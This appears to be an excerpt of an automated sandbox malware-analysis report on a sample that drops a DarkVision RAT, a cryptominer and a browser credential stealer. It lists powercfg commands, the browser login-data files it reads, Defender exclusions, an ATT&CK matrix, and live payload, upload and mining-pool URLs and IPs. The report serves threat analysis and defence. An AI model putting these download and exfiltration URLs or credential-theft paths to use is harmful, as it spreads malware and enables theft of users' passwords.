                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeCode function: 13_2_003141E0 __snwprintf,RegCreateKeyExW,RegCloseKey,_memset,GetSystemTime,SystemTimeToFileTime,13_2_003141E0
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeCode function: 13_2_00322530 LocalAlloc,LoadLibraryW,LocalFree,GetProcAddress,LocalFree,_memset,LocalFree,GetUserGeoID,gethostname,gethostbyname,GetComputerNameExW,GetUserNameW,GetTickCount64,LocalFree,13_2_00322530
                    Source: C:\Windows\explorer.exeCode function: 18_2_0238A674 _lock,_get_daylight,_get_daylight,_get_daylight,___lc_codepage_func,free,free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,18_2_0238A674
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeCode function: 13_2_0031C090 GetModuleHandleA,GetProcAddress,RtlGetVersion,13_2_0031C090
                    Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Lowering of HIPS / PFW / Operating System Security Settings

                    barindex
                    Modifies power options to not sleep / hibernate
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                    Source: explorer.exe, 0000001C.00000002.2933340637.00000000013E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: procexp.exe

                    Stealing of Sensitive Information

                    barindex
                    Yara detected DarkVision Rat
                    Source: Yara matchFile source: 13.2.downloaded_file.exe.300000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.powershell.exe.29e75ee9280.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.downloaded_file.exe.fedfd8.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.explorer.exe.e00000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.powershell.exe.29e75e6b438.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.powershell.exe.29e75e6b438.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.0.downloaded_file.exe.300000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.powershell.exe.29e75ee9280.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000C.00000002.1939596081.0000029E75EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000003.1947121395.0000000000FEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000000.1946141643.0000000000332000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.1957167452.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.1939596081.0000029E75DED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7644, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: downloaded_file.exe PID: 7724, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 7784, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe, type: DROPPED
                    Contains functionality to steal Chrome passwords or cookies
                    Source: C:\Windows\explorer.exeCode function: ENCWCHAR \Google\Chrome\User Data\Default\Login Data18_2_022C40D0
                    Contains functionality to steal saved passwords of Firefox
                    Source: C:\Windows\explorer.exeCode function: LocalAlloc,LocalAlloc,LocalAlloc,SHGetKnownFolderPath,LocalAlloc,LocalAlloc,GetPrivateProfileStringW,LocalAlloc,_snprintf,LocalAlloc,_snprintf,CreateFileA,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,wsprintfW,type_info::_name_internal_method,wsprintfW,type_info::_name_internal_method,type_info::_name_internal_method,MultiByteToWideChar,wsprintfW,type_info::_name_internal_method,type_info::_name_internal_method,MultiByteToWideChar,wsprintfW,LocalFree,CloseHandle,LocalFree,LocalFree,LocalFree,LocalFree,CoTaskMemFree,LocalFree,LocalFree,LocalFree, encryptedPassword18_2_022CAF00
                    Source: C:\Windows\explorer.exeCode function: LocalAlloc,LocalAlloc,LocalAlloc,SHGetKnownFolderPath,LocalAlloc,LocalAlloc,GetPrivateProfileStringW,LocalAlloc,_snprintf,LocalAlloc,_snprintf,CreateFileA,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,wsprintfW,type_info::_name_internal_method,wsprintfW,type_info::_name_internal_method,type_info::_name_internal_method,MultiByteToWideChar,wsprintfW,type_info::_name_internal_method,type_info::_name_internal_method,MultiByteToWideChar,wsprintfW,LocalFree,CloseHandle,LocalFree,LocalFree,LocalFree,LocalFree,CoTaskMemFree,LocalFree,LocalFree,LocalFree, encryptedPassword18_2_022CAF00
                    Source: C:\Windows\explorer.exeCode function: LocalAlloc,LocalAlloc,LocalAlloc,SHGetKnownFolderPath,LocalAlloc,LocalAlloc,GetPrivateProfileStringW,LocalAlloc,_snprintf,LocalAlloc,_snprintf,CreateFileA,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,wsprintfW,type_info::_name_internal_method,wsprintfW,type_info::_name_internal_method,type_info::_name_internal_method,MultiByteToWideChar,wsprintfW,type_info::_name_internal_method,type_info::_name_internal_method,MultiByteToWideChar,wsprintfW,LocalFree,CloseHandle,LocalFree,LocalFree,LocalFree,LocalFree,CoTaskMemFree,LocalFree,LocalFree,LocalFree, encryptedPassword18_2_022CAF00
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
                    Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
                    Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Login Data
                    Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Login Data
                    Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
                    Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\pkcs11.txt
                    Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\pkcs11.txt

                    Remote Access Functionality

                    barindex
                    Yara detected DarkVision Rat
                    Source: Yara matchFile source: 13.2.downloaded_file.exe.300000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.powershell.exe.29e75ee9280.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.downloaded_file.exe.fedfd8.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.explorer.exe.e00000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.powershell.exe.29e75e6b438.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.powershell.exe.29e75e6b438.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.0.downloaded_file.exe.300000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.powershell.exe.29e75ee9280.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000C.00000002.1939596081.0000029E75EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000003.1947121395.0000000000FEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000000.1946141643.0000000000332000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.1957167452.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.1939596081.0000029E75DED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7644, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: downloaded_file.exe PID: 7724, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 7784, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe, type: DROPPED

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information11
                    Scripting                    		Valid Accounts11
                    Windows Management Instrumentation                    		11
                    Scripting                    		1
                    Exploitation for Privilege Escalation                    		11
                    Disable or Modify Tools                    		2
                    OS Credential Dumping                    		2
                    System Time Discovery                    		Remote Services1
                    Archive Collected Data                    		2
                    Ingress Tool Transfer                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts23
                    Native API                    		1
                    DLL Side-Loading                    		1
                    Abuse Elevation Control Mechanism                    		1
                    Deobfuscate/Decode Files or Information                    		21
                    Input Capture                    		11
                    Account Discovery                    		Remote Desktop Protocol1
                    Data from Local System                    		21
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts1
                    Exploitation for Client Execution                    		1
                    Windows Service                    		1
                    DLL Side-Loading                    		1
                    Abuse Elevation Control Mechanism                    		2
                    Credentials In Files                    		3
                    File and Directory Discovery                    		SMB/Windows Admin Shares21
                    Input Capture                    		1
                    Non-Standard Port                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal Accounts12
                    Command and Scripting Interpreter                    		2
                    Registry Run Keys / Startup Folder                    		1
                    Windows Service                    		2
                    Obfuscated Files or Information                    		NTDS126
                    System Information Discovery                    		Distributed Component Object ModelInput Capture2
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud Accounts2
                    PowerShell                    		Network Logon Script612
                    Process Injection                    		1
                    Software Packing                    		LSA Secrets451
                    Security Software Discovery                    		SSHKeylogging113
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts2
                    Registry Run Keys / Startup Folder                    		1
                    DLL Side-Loading                    		Cached Domain Credentials131
                    Virtualization/Sandbox Evasion                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Masquerading                    		DCSync13
                    Process Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    Modify Registry                    		Proc Filesystem1
                    Application Window Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt131
                    Virtualization/Sandbox Evasion                    		/etc/passwd and /etc/shadow1
                    System Owner/User Discovery                    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron612
                    Process Injection                    		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1571252 Sample: file.exe Startdate: 09/12/2024 Architecture: WINDOWS Score: 100 101 woo097878781.win 2->101 103 pool.hashvault.pro 2->103 123 Multi AV Scanner detection for domain / URL 2->123 125 Suricata IDS alerts for network traffic 2->125 127 Found malware configuration 2->127 129 16 other signatures 2->129 12 file.exe 8 2->12         started        15 cmd.exe 2->15         started        signatures3 process4 file5 91 C:\Users\user\AppData\Local\Temp\...\295D.bat, ASCII 12->91 dropped 17 cmd.exe 2 12->17         started        21 WindosCPUsystem.exe 15->21         started        23 conhost.exe 15->23         started        process6 file7 89 C:\Users\user\...\AutoRun_WindosCPUsystem.bat, DOS 17->89 dropped 113 Suspicious powershell command line found 17->113 115 Drops script or batch files to the startup folder 17->115 117 Adds a directory exclusion to Windows Defender 17->117 25 downloaded_file.exe 3 1 17->25         started        28 powershell.exe 23 17->28         started        30 powershell.exe 14 15 17->30         started        42 4 other processes 17->42 119 Found direct / indirect Syscall (likely to bypass EDR) 21->119 121 Modifies power options to not sleep / hibernate 21->121 34 powercfg.exe 21->34         started        36 powercfg.exe 21->36         started        38 powercfg.exe 21->38         started        40 powercfg.exe 21->40         started        signatures8 process9 dnsIp10 137 Multi AV Scanner detection for dropped file 25->137 139 Found evasive API chain (may stop execution after checking mutex) 25->139 141 Machine Learning detection for dropped file 25->141 149 6 other signatures 25->149 44 explorer.exe 2 3 25->44         started        49 cmd.exe 1 25->49         started        143 Found suspicious powershell code related to unpacking or dynamic code loading 28->143 145 Loading BitLocker PowerShell Module 28->145 147 Powershell drops PE file 28->147 111 woo097878781.win 154.216.20.243, 443, 49730, 49737 SKHT-ASShenzhenKatherineHengTechnologyInformationCo Seychelles 30->111 97 C:\Users\user\AppData\...\downloaded_file.bin, data 30->97 dropped 51 conhost.exe 34->51         started        53 conhost.exe 36->53         started        55 conhost.exe 38->55         started        57 conhost.exe 40->57         started        99 C:\Users\user\AppData\...\downloaded_file.exe, PE32 42->99 dropped 59 net1.exe 1 42->59         started        file11 signatures12 process13 dnsIp14 109 185.157.162.216, 49739, 49741, 49744 OBE-EUROPEObenetworkEuropeSE Sweden 44->109 93 C:\ProgramData\...\WindosCPUsystem.exe, PE32+ 44->93 dropped 151 System process connects to network (likely due to code injection or exploit) 44->151 153 Benign windows process drops PE files 44->153 155 Found evasive API chain (may stop execution after checking mutex) 44->155 159 4 other signatures 44->159 61 WindosCPUsystem.exe 44->61         started        65 explorer.exe 44->65         started        157 Adds a directory exclusion to Windows Defender 49->157 67 powershell.exe 23 49->67         started        69 conhost.exe 49->69         started        file15 signatures16 process17 file18 95 C:\Users\user\AppData\...\asrjskwdsdoc.sys, PE32+ 61->95 dropped 161 Machine Learning detection for dropped file 61->161 163 Injects code into the Windows Explorer (explorer.exe) 61->163 165 Uses powercfg.exe to modify the power settings 61->165 171 4 other signatures 61->171 71 explorer.exe 61->71         started        75 powercfg.exe 61->75         started        77 powercfg.exe 61->77         started        79 2 other processes 61->79 167 Tries to harvest and steal browser information (history, passwords, etc) 65->167 169 Loading BitLocker PowerShell Module 67->169 signatures19 process20 dnsIp21 105 5.188.137.200, 3333, 49816 SELECTEL-MSKRU Russian Federation 71->105 107 pool.hashvault.pro 37.203.243.102, 3333, 49742 DAPLDATAPLANETLtdRU Russian Federation 71->107 131 System process connects to network (likely due to code injection or exploit) 71->131 133 Query firmware table information (likely to detect VMs) 71->133 135 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 71->135 81 conhost.exe 75->81         started        83 conhost.exe 77->83         started        85 conhost.exe 79->85         started        87 conhost.exe 79->87         started        signatures22 process23

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    file.exe34%ReversingLabsWin64.Downloader.Generic
                    file.exe45%VirustotalBrowse
                    file.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Temp\downloaded_file.exe100%Joe Sandbox ML
                    C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\asrjskwdsdoc.sys5%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\downloaded_file.exe83%ReversingLabsWin32.Trojan.Doina

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    SourceDetectionScannerLabelLink
                    woo097878781.win11%VirustotalBrowse

                    URLs

                    SourceDetectionScannerLabelLink
                    https://woo097878781.win/32.EXEhttps://woo097878781.win/64.EXEhttps://woo097878781.win/upload.php66M0%Avira URL Cloudsafe
                    https://woo097878781.win/downloaded_file.bin0%Avira URL Cloudsafe
                    https://woo097878781.win/rdpi20%Avira URL Cloudsafe
                    https://woo097878781.win/64.EXEhttps://woo097878781.win/upload.php66Mozilla/5.00%Avira URL Cloudsafe
                    https://woo097878781.win/WindosCPUsystem.exeWindowsSystem10%Avira URL Cloudsafe
                    https://woo097878781.win/8p0%Avira URL Cloudsafe
                    https://woo097878781.win/66/api/endpoint.phpJWO0%Avira URL Cloudsafe
                    https://woo097878781.win/WindosCPUsystem.exe100%Avira URL Cloudmalware
                    https://woo097878781.win/66/api/endpoint.php0%Avira URL Cloudsafe
                    https://woo097878781.win0%Avira URL Cloudsafe
                    https://woo097878781.win/WindosCPUsystem.exeWindowsSystem1WindosCPUsystem.exe0%Avira URL Cloudsafe
                    https://woo097878781.win/66/api/endpoint.php--cinit-version=3.4.1--nicehash--tls--cinit-idle-wait=5-0%Avira URL Cloudsafe
                    https://woo097878781.win/0%Avira URL Cloudsafe
                    https://woo097878781.win/upload.php100%Avira URL Cloudmalware
                    https://woo097878781.win/32.EXE0%Avira URL Cloudsafe
                    https://woo097878781.win/66/api/endpoint.php60%Avira URL Cloudsafe
                    https://woo097878781.win:443/upload.phpZ0%Avira URL Cloudsafe
                    https://woo097878781.win/r0%Avira URL Cloudsafe
                    https://woo097878781.win:443/upload.php100%Avira URL Cloudmalware
                    http://woo097878781.win0%Avira URL Cloudsafe
                    https://woo097878781.win/66/api/endpoint.phpProvider0%Avira URL Cloudsafe
                    https://woo097878781.win/downloaded_file.bin6%VirustotalBrowse
                    https://woo097878781.win/66/api/endpoint.phpyeerysyjbfoqmofc0%Avira URL Cloudsafe
                    https://woo097878781.win/C0%Avira URL Cloudsafe
                    https://woo097878781.win/64.EXE0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    pool.hashvault.pro
                    		37.203.243.102
                    		truefalse
                      		high
                      woo097878781.win
                      		154.216.20.243
                      		truetrueunknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://woo097878781.win/downloaded_file.bintrue
                      • 6%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      https://woo097878781.win/WindosCPUsystem.exetrue
                      • Avira URL Cloud: malware
                      		unknown
                      https://woo097878781.win/64.EXEtrue
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://nuget.org/NuGet.exepowershell.exe, 00000007.00000002.1823090000.0000023864C62000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1823090000.0000023864DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1807712895.0000023856574000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000007.00000002.1807712895.0000023856378000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://woo097878781.win/rdpi2explorer.exe, 00000012.00000003.2618182430.0000000000915000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2644899581.0000000000915000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000007.00000002.1807712895.00000238564EE000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://r11.o.lencr.org0#explorer.exe, 00000012.00000003.2618390437.0000000002841000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2618077052.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2618182430.0000000000915000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2643180030.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2618256867.0000000002840000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2644899581.0000000000915000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://woo097878781.win/64.EXEhttps://woo097878781.win/upload.php66Mozilla/5.0downloaded_file.exe, 0000000D.00000003.1947121395.0000000001063000.00000004.00000020.00020000.00000000.sdmptrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://crl.microsoftpowershell.exe, 00000007.00000002.1807555858.00000238530B4000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000007.00000002.1807712895.00000238564EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://go.micropowershell.exe, 00000007.00000002.1807712895.0000023855822000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://woo097878781.win/WindosCPUsystem.exeWindowsSystem1explorer.exe, 00000010.00000002.2934582465.00000000030A0000.00000004.00000020.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://woo097878781.win/32.EXEhttps://woo097878781.win/64.EXEhttps://woo097878781.win/upload.php66Mpowershell.exe, 0000000C.00000002.1939596081.0000029E75EE0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1939596081.0000029E75F5E000.00000004.00000800.00020000.00000000.sdmp, downloaded_file.exe, 0000000D.00000000.1946157857.0000000000376000.00000008.00000001.01000000.00000007.sdmp, downloaded_file.exe, 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp, explorer.exe, 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://contoso.com/Licensepowershell.exe, 00000007.00000002.1807712895.0000023856574000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://contoso.com/Iconpowershell.exe, 00000007.00000002.1807712895.0000023856574000.00000004.00000800.00020000.00000000.sdmpfalse
